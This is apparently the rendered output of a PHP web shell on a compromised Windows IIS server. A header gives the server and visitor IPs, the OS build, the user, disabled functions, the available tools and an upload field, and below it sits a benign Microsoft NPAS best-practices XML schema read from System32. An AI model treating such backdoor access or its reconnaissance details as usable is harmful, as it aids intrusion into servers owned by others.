| Server IP : 185.208.173.17 / Your IP : 87.236.161.98 Web Server : Microsoft-IIS/10.0 System : Windows NT SRV8576125506 10.0 build 26100 (Windows Server 2016) AMD64 User : IUSR ( 0) PHP Version : 7.4.13 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : OFF | Perl : OFF | Python : OFF | Sudo : OFF | Pkexec : OFF Directory : C:/Windows/System32/BestPractices/v1.0/Models/Microsoft/Windows/NPAS/ |
Upload File : |
<?xml version="1.0" encoding="UTF-8" ?>
<xs:schema
targetNamespace="http://schemas.microsoft.com/mbca/models/NPAS/2009/11"
xmlns:tns="http://schemas.microsoft.com/mbca/models/NPAS/2009/11"
elementFormDefault="qualified"
xmlns:xs="http://www.w3.org/2001/XMLSchema">
<xs:element name="NPAS" type="tns:NPAS" />
<xs:complexType name="NPAS">
<xs:sequence>
<xs:element name="ScanTime" type="tns:TimeType" minOccurs="0" maxOccurs="1"/>
<xs:element name="NPSSERVER" type="tns:NPSSERVERType" minOccurs="0" maxOccurs="1"/>
</xs:sequence>
</xs:complexType>
<xs:complexType name="NPSSERVERType">
<xs:sequence>
<xs:element name="NpsServiceStatus" type="xs:string" minOccurs="0" maxOccurs="1"/>
<xs:element name="NpsCrpEnabled" type="xs:string" minOccurs="0" maxOccurs="1"/>
<xs:element name="NpsNetworkPolicyEnabled" type="xs:string" minOccurs="0" maxOccurs="1"/>
<xs:element name="NpsAuthentication" type="tns:NpsAuthenticationType" minOccurs="0" maxOccurs="1"/>
<xs:element name="NasRunningLocally" type="xs:string" minOccurs="0" maxOccurs="1"/>
</xs:sequence>
</xs:complexType>
<xs:complexType name="NpsAuthenticationType">
<xs:sequence>
<xs:element name="Supported" type="xs:string"/>
<xs:element name="CRPPolicyNames" type="xs:string"/>
<xs:element name="NPPolicyNames" type="xs:string"/>
</xs:sequence>
</xs:complexType>
<xs:complexType name="TimeType">
<xs:simpleContent>
<xs:extension base="xs:string">
<xs:attribute name="ticks" type="xs:decimal" />
</xs:extension>
</xs:simpleContent>
</xs:complexType>
</xs:schema>